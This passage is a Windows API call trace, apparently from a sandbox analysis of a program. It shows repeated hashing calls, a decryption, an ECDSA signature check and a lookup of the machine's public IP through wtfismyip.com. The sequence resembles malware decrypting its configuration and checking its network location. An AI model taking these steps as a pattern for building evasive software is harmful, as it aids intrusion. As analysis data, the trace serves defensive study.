(in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.052] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.052] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0147.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56530 [0147.053] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.053] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.053] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.053] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.053] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0147.053] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e562f0 [0147.053] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.053] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.053] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.054] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.054] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0147.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56c80 [0147.054] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.054] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.054] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.054] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.054] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0147.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56d10 [0147.055] CryptDestroyHash (hHash=0x332b7820) returned 1 [0147.055] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.055] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.055] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.055] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0147.055] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56350 [0147.055] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.055] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.055] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.056] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.056] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0147.056] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56380 [0147.056] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.056] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.056] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.057] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.057] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0147.057] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56cb0 [0147.058] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.058] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.058] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.058] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.058] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0147.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e563e0 [0147.058] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.058] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.058] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.059] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.059] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0147.059] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56d40 [0147.059] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.059] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.059] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.060] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.060] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0147.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56d70 [0147.060] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.060] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.060] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.060] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.060] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0147.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a350 [0147.061] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.061] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.061] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.061] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.061] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0147.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59f00 [0147.061] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.061] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.061] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.062] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.062] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0147.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59f60 [0147.062] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.062] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.062] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.062] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.062] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0147.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a590 [0147.063] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.063] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.063] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.063] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.063] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0147.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59c30 [0147.063] CryptDestroyHash (hHash=0x332b7970) returned 1 [0147.063] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.063] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.064] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.064] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0147.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a3e0 [0147.064] CryptDestroyHash (hHash=0x332b7820) returned 1 [0147.064] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.064] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.064] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.064] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0147.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59ff0 [0147.065] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0147.065] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.065] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.065] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.065] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0147.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a110 [0147.065] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.065] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.065] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.066] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.066] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0147.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a080 [0147.066] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.066] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.066] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.067] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.067] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0147.067] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59de0 [0147.067] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.067] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.067] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.068] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.068] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0147.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59db0 [0147.068] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.068] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.068] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.068] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.068] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0147.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a260 [0147.068] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.068] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.068] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.069] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.069] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0147.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a560 [0147.069] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.069] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.069] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.070] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.070] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0147.070] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a1d0 [0147.070] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.070] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.070] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.070] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.070] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0147.070] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a0b0 [0147.071] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.071] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.071] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.071] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.071] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0147.071] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a0e0 [0147.071] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.071] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.071] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.072] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.072] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0147.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59ea0 [0147.072] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.072] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.072] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.072] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.072] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0147.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a470 [0147.072] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0147.072] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.073] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.073] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.073] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0147.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a380 [0147.073] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.073] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.073] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.074] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.074] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0147.074] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a2f0 [0147.074] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.074] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.074] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.074] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.074] CryptHashData (hHash=0x332b79e0, pbData=0x32e4a600, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0147.074] CryptDestroyHash (hHash=0x332b79e0) returned 1 [0147.074] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.074] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.075] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.075] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0147.075] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.075] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.075] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.076] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.076] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0147.076] CryptDestroyHash (hHash=0x332b7660) returned 1 [0147.076] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.076] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0147.076] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0147.076] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0147.076] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0147.076] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.079] CryptSetKeyParam (hKey=0x332b79e0, dwParam=0x4, pbData=0xcea74*=0x1, dwFlags=0x0) returned 1 [0147.079] CryptSetKeyParam (hKey=0x332b79e0, dwParam=0x1, pbData=0x32e5a290, dwFlags=0x0) returned 1 [0147.080] CryptDecrypt (in: hKey=0x332b79e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e419f0, pdwDataLen=0xcea5c | out: pbData=0x32e419f0, pdwDataLen=0xcea5c) returned 1 [0147.081] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0147.081] CryptDestroyKey (hKey=0x332b79e0) returned 0 [0147.081] GetVersion () returned 0x295a000a [0147.082] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce9c8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xce9c8) returned 0x0 [0147.083] BCryptImportKeyPair (in: hAlgorithm=0x332a17b0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0xce9c0, pbInput=0x32e40d90, cbInput=0x68, dwFlags=0x0 | out: phKey=0xce9c0) returned 0x0 [0147.084] BCryptGetProperty (in: hObject=0x337bb150, pszProperty="SignatureLength", pbOutput=0xce9bc, cbOutput=0x4, pcbResult=0xce9dc, dwFlags=0x0 | out: pbOutput=0xce9bc, pcbResult=0xce9dc) returned 0x0 [0147.084] BCryptVerifySignature (hKey=0x337bb150, pPaddingInfo=0x0, pbHash=0x32e407f0, cbHash=0x30, pbSignature=0x32e41a26, cbSignature=0x60, dwFlags=0x0) returned 0x0 [0147.085] BCryptDestroyKey (in: hKey=0x337bb150 | out: hKey=0x337bb150) returned 0x0 [0147.085] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x332a17b0, dwFlags=0x0 | out: hAlgorithm=0x332a17b0) returned 0x0 [0147.085] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407f0 | out: hHeap=0x2150000) returned 1 [0147.086] CharLowerBuffA (in: lpsz="ssert", cchLength=0x5 | out: lpsz="ssert") returned 0x5 [0147.088] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5 [0147.090] WinHttpConnect (hSession=0x71b780, pswzServerName="wtfismyip.com", nServerPort=0x50, dwReserved=0x0) returned 0x332bdbd0 [0147.090] WinHttpOpenRequest (hConnect=0x332bdbd0, pwszVerb="GET", pwszObjectName="/text", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x78e190 [0147.090] WinHttpSendRequest (hRequest=0x78e190, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0147.181] WinHttpReceiveResponse (hRequest=0x78e190, lpReserved=0x0) returned 1 [0147.181] WinHttpQueryHeaders (in: hRequest=0x78e190, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xcde54, lpdwBufferLength=0xcde5c, lpdwIndex=0x0 | out: lpBuffer=0xcde54*, lpdwBufferLength=0xcde5c*=0x4, lpdwIndex=0x0) returned 1 [0147.181] WinHttpQueryDataAvailable (in: hRequest=0x78e190, lpdwNumberOfBytesAvailable=0xcdf30 | out: lpdwNumberOfBytesAvailable=0xcdf30*=0xf) returned 1 [0147.181] WinHttpReadData (in: hRequest=0x78e190, lpBuffer=0x32e49fe0, dwNumberOfBytesToRead=0xf, lpdwNumberOfBytesRead=0xcdf34 | out: lpBuffer=0x32e49fe0*, lpdwNumberOfBytesRead=0xcdf34*=0xf) returned 1 [0147.181] WinHttpQueryDataAvailable (in: hRequest=0x78e190, lpdwNumberOfBytesAvailable=0xcdf30 | out: lpdwNumberOfBytesAvailable=0xcdf30*=0x0) returned 1 [0147.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e49fe0, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0147.182] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5a140 [0147.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e49fe0, cbMultiByte=14, lpWideCharStr=0x32e5a140, cchWideChar=14 | out: lpWideCharStr="88.153.199.169") returned 14 [0147.182] WinHttpCloseHandle (hInternet=0x78e190) returned 1 [0147.182] WinHttpCloseHandle (hInternet=0x332bdbd0) returned 1 [0147.182] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e59b40 | out: hHeap=0x2150000) returned 1 [0147.182] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xce208 | out: lpSystemTimeAsFileTime=0xce208*(dwLowDateTime=0xe43dc478, dwHighDateTime=0x1d7b3c9)) [0147.182] WinHttpCloseHandle (hInternet=0x7581f0) returned 1 [0147.196] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", 